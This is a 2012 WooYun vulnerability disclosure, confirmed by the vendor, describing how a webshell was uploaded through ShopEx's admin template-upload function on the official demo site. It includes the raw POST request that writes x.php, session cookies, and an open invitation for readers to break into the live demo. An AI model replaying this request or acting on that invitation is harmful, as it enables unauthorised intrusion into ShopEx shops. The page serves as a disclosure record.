当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06169

漏洞标题:shopex演示站后台上传木马,演示站竟然是开源的

相关厂商:ShopEx

漏洞作者: 江南的鱼

提交时间:2012-04-18 00:00

修复时间:2012-06-02 00:00

公开时间:2012-06-02 00:00

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-04-18: 细节已通知厂商并且等待厂商处理中
2012-04-18: 厂商已经确认,细节仅向厂商公开
2012-04-28: 细节向核心白帽子及相关领域专家公开
2012-05-08: 细节向普通白帽子公开
2012-05-18: 细节向实习白帽子公开
2012-06-02: 细节向公众公开

简要描述:

shopex官方演示站,目前来讲,安全性还是非常好的,现在了上传的文件内容,如果含有<?等就会自动转到主页去,所以我之前所利用的方法,抓包改文件名为:t.php,对官方演示已经失效了【其他非官方的,仍然有效】,原因是官网的演示站对PHP内容进行了监控,即便生成php文件,也是过滤了内容的,不能运行!不过我今晚发现过滤也是片面的,也存在一点瑕疵,我成功上传了木马,发现演示站使用的程序,竟然是未加密的,看来官方对自己的技术还是非常自信的!演示站地址:http://demo.shopex.com.cn/,各位喜欢的,可以去突破下,有开源的shopex等着你拿!
这个漏洞的Pank顶多在10,但是泄漏了Shopex源码,所以我个人认为从厂家的严重后果来说,Pank 20 不为过!

详细说明:

由于时间关系,不做多说,等我从上海回来后,再做详细的说明,这个是我今天晚上发现的哦!
之前的shopex 4.8.5 后台上传木马的方法很简单:
图示:


这只是之前用的一个方法。
这次拿演示站的方法和上面完全不同!
形成原因,主要是技术人员编程习惯造成!官方可以仔细检查下模板上传代码,也许就会发现问题。

漏洞证明:

POST /485/shopadmin/index.php?ctl=system/tmpimage&act=saveSource&_ajax=true&_ss=site HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.xxxxxxxx.com/shopadmin/index.php#ctl=system/tmpimage&act=detail&p[0]=yyq-info.xml
Accept: text/javascript, text/html, application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded; charset=utf-8
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)
Host: www.xxxxxxxx.com
Content-Length: 1260
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SHOPEX_LOGIN_NAME=admin; SHOPEX_SID=0da852eac4999ce82450c9234a6636af; SHOPEX_LG_KEY=ce38449d68a97f5e77985636c900721a; vary=27974dd2b5be612c11922ea4d6487e147a2343a361a328b9bae273711797bc1b; loginpass=f4f068e71e0d87bf0ad51e6214ab84e9
id=yyq-info.xml&tmpid=yyq&name=x.php&file_source=木马内容


来张演示站截图,程序是源码的哦!


再来张:


修复方案:

仔细过滤压缩包的内容!

版权声明:转载请注明来源 江南的鱼@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-04-18 10:36

厂商回复:

感谢您的提交,我们会尽快处理!
希望通过大家的共同努力,不断完善和提高产品的安全性。
非常感谢!!!

最新状态:

暂无


漏洞评价:

评论

  1. 2012-04-18 00:01 | 江南的鱼 ( 普通白帽子 | Rank:137 漏洞数:15 | 天生庸才!)

    晚上精神不好,里面打错了一句话:"现在了上传的文件内容",正确应该是“现在限制了上传的文件内容”

  2. 2012-04-18 00:09 | 江南的鱼 ( 普通白帽子 | Rank:137 漏洞数:15 | 天生庸才!)

    图片上传错了,还找不到修改!希望改进下,预览功能很重要,如果能修改最好!

  3. 2012-04-18 09:12 | 我真的不帅 ( 路人 | Rank:19 漏洞数:7 | 今朝有酒今朝醉,天道茫茫何所求)

    @江南的鱼 403 forbidden 了

  4. 2012-04-18 10:09 | 江南的鱼 ( 普通白帽子 | Rank:137 漏洞数:15 | 天生庸才!)

    @我真的不帅,真对不起,我给的官方演示地址后面需要加485,晚上精神差,搞错了几处,下次我一定检查仔细

  5. 2012-04-18 12:12 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @江南的鱼 应该是有预览功能的,修改功能我们近期添加吧,多谢你的支持!

  6. 2012-04-18 13:36 | 我真的不帅 ( 路人 | Rank:19 漏洞数:7 | 今朝有酒今朝醉,天道茫茫何所求)

    @江南的鱼 客气了,挺辛苦的

  7. 2012-06-02 01:07 | 歌颂 ( 实习白帽子 | Rank:36 漏洞数:5 | #1024)

    - - 第一次看见内网IP是127.0.0.1的

  8. 2012-06-02 15:19 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    shopex本来就是开源的啊

  9. 2012-06-02 15:22 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @蟋蟀哥哥 不开源的

  10. 2012-06-02 16:09 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @xsser 是假开源还是不开源呢.我看他们有提供下载的啊。比ex优秀的b2c开源多了去了